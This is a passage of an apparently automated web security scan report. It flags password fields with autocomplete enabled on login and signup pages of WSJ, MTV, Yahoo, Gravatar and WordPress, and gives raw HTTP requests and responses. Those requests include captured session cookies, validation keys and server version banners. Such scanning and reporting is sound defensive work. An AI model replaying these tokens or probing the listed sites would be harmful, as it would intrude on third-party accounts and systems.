Set-Cookie: .ASPXANONYMOUS=flqSVfpIzQEkAAAAMzA1NzIxYjgtYzlkNC00NWY4LWI3OWQtZjRiMDhkYWUwZTI30; expires=Wed, 13-Jun-2012 00:20:27 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=2a914746-9765-436b-a58d-940ead33ec3a; domain=yadvertisingblog.app3.hubspot.com; expires=Sun, 13-Jun-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT159=487658668.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 13172;
var hsWeekEndsIn = 531572;
var hsMonthEndsIn = 1481972;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-06-13 20:20
...[SNIP]...
13. Password field with autocomplete enabled  previous  next
There are 19 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /shopandbuy/order/subscribe.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /shopandbuy/order/subscribe.jsp?trackCode=aaagprmz HTTP/1.1
Host: buy.wsj.com
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBPAPP_4_2_0_GA date=200706281411)/Tomcat-5.5
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 112017


                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<div class="reveal-content">

<form action="?_DARGS=/shopandbuy/elab/components/special-module/special-comp-4a.jspf.sbLoginForm" name="loginForm" method="post"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
<div class="field">
                   <input value="" maxlength="15" type="password" name="password-ck" id="password-ck"><input value=" " type="hidden" name="_D:password-ck">
...[SNIP]...
13.2. https://buy.wsj.com/shopandbuy/order/subscribe.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /shopandbuy/order/subscribe.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /shopandbuy/order/subscribe.jsp?trackCode=aaagprmz HTTP/1.1
Host: buy.wsj.com
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBPAPP_4_2_0_GA date=200706281411)/Tomcat-5.5
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 112017


                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<div class="form-fields" class="toggled">

       
                               <form action="?_DARGS=/shopandbuy/elab/modules/form-fields.jspf.sbSubscribe" name="addOffer" method="post" id="addOffer"><input value="ISO-8859-1" type="hidden" name="_dyncharset">
...[SNIP]...
<div class="field">                    
                       <input value="" maxlength="15" type="password" name="accountPassword" id="account-password"><input value=" " type="hidden" name="_D:accountPassword">
...[SNIP]...
<div class="field">                    
                       <input value="" maxlength="15" type="password" name="accountPasswordConfirm" id="account-password-confirm"><input value=" " type="hidden" name="_D:accountPasswordConfirm">
...[SNIP]...
13.3. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112537492&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com; MasterAuthIsRequested=true; FbStatusChecked=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w08w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
ntCoent-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:28:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112537492&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...
13.4. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com&authCookie= HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w04w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
ntCoent-Length: 23701
Content-Length: 23701
Date: Tue, 14 Jun 2011 00:27:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 14-Jun-2010 00:27:49 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com&amp;authCookie=" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...
13.5. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112537492&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com&authCookie= HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; MasterAuthIsRequested=true; FbStatusChecked=; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112537492&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w04w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
ntCoent-Length: 23701
Content-Length: 23701
Date: Tue, 14 Jun 2011 00:28:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 14-Jun-2010 00:28:34 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112537492&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com&amp;authCookie=" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...
13.6. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...
13.7. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /registration?.intl=us&.pd=flickrsignin_ver%253D0%2526c%253DJvVF95K62e6PzdPu7MBv2V8-%2526ivt%253D%2526sg%253D&new=1&.done=https%3A//login.yahoo.com/config/validate%3F.src=flickrsignin%26.pc=8190%26.scrumb=0%26.pd=c%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl=us%26.done=http%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne&.src=flickrsignin&.v=0&.u=2f7737p6vdago&partner=&.partner=&pkg=&stepid=&.p=&promo=&.last= HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 52347


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
<!-- begin: form -->
<form id="regFormBody" name="regFormBody" action="/registration" method="post">
<input type="hidden" id="pfmo" name="pfmo" value=""/>
...[SNIP]...
<div class="collection">
<input type="password" name="password" id="password" value="" size="32" maxlength="32" class="">
<div id="meter_tag">
...[SNIP]...
<div class="collection">
<input type="password" name="passwordconfirm" id="passwordconfirm" value="" size="32" maxlength="32" class="">
</div>
...[SNIP]...
13.8. http://en.gravatar.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:30:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 9877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</h4>
   <form action="/sessions/emails%252F" method="post">
       <p>
...[SNIP]...
</label>
           <input type="password" class="text" id="account_password" name="pass" />
       </p>
...[SNIP]...
13.9. http://en.gravatar.com/site/login/%252F  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /site/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</p>

                   <form method="post" action="/sessions/">
                       <p>
...[SNIP]...
</label>
                           <input type="password" size="30" name="pass" id="account_password" class="text"/>
                       </p>
...[SNIP]...
13.10. https://en.wordpress.com/signup/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /signup/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /signup/ HTTP/1.1
Host: en.wordpress.com
Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
